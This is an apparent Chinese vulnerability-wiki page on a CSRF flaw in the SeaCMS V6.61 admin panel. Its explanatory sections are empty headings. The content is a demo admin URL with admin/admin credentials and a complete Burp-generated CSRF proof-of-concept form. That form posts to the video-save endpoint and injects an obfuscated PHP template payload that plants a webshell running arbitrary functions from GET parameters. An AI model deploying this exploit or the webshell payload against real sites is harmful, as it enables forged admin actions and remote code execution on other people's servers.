跳转至

Seacms V6.61 后台csrf

一、漏洞简介

二、漏洞影响

三、复现过程

http://www.0-sec.org:10089/backend/,用户名和密码为admin | admin

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
  <!-- adjust action to your url -->
    <form action="http://www.0-sec.org/seacms/backend/admin_video.php?action=save&acttype=add" method="POST">
      <input type="hidden" name="v_commend" value="0" />
      <input type="hidden" name="v_name" value="getshell" />
      <input type="hidden" name="v_enname" value="ceshi" />
      <input type="hidden" name="v_color" value="#FF0000" />
      <input type="hidden" name="v_type" value="5" />
      <input type="hidden" name="v_state" value="5" />
      <input type="hidden" name="v_pic" value="{if:1)$GLOBALS['_G'.'ET'][a]($GLOBALS['_G'.'ET'][b]);//}{end if}" />
      <input type="hidden" name="v_spic" value="" />
      <input type="hidden" name="v_gpic" value="" />
      <input type="hidden" name="v_actor" value="" />
      <input type="hidden" name="v_director" value="" />
      <input type="hidden" name="v_commend" value="0" />
      <input type="hidden" name="v_note" value="" />
      <input type="hidden" name="v_tags" value="" />
      <input type="hidden" name="select3" value="" />
      <input type="hidden" name="v_publishyear" value="" />
      <input type="hidden" name="select2" value="" />
      <input type="hidden" name="v_lang" value="" />
      <input type="hidden" name="select1" value="" />
      <input type="hidden" name="v_publisharea" value="" />
      <input type="hidden" name="select4" value="" />
      <input type="hidden" name="v_ver" value="" />
      <input type="hidden" name="v_hit" value="0" />
      <input type="hidden" name="v_monthhit" value="0" />
      <input type="hidden" name="v_weekhit" value="0" />
      <input type="hidden" name="v_dayhit" value="0" />
      <input type="hidden" name="v_len" value="" />
      <input type="hidden" name="v_total" value="" />
      <input type="hidden" name="v_nickname" value="" />
      <input type="hidden" name="v_company" value="" />
      <input type="hidden" name="v_tvs" value="" />
      <input type="hidden" name="v_douban" value="" />
      <input type="hidden" name="v_mtime" value="" />
      <input type="hidden" name="v_imdb" value="" />
      <input type="hidden" name="v_score" value="" />
      <input type="hidden" name="v_scorenum" value="" />
      <input type="hidden" name="v_longtxt" value="" />
      <input type="hidden" name="v_money" value="0" />
      <input type="hidden" name="v_psd" value="" />
      <input type="hidden" name="v_playfrom[1]" value="" />
      <input type="hidden" name="v_playurl[1]" value="" />
      <input type="hidden" name="m_downfrom[1]" value="" />
      <input type="hidden" name="m_downurl[1]" value="" />
      <input type="hidden" name="v_content" value="" />
      <input type="hidden" name="Submit" value="�¡®�®š�浜¤" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>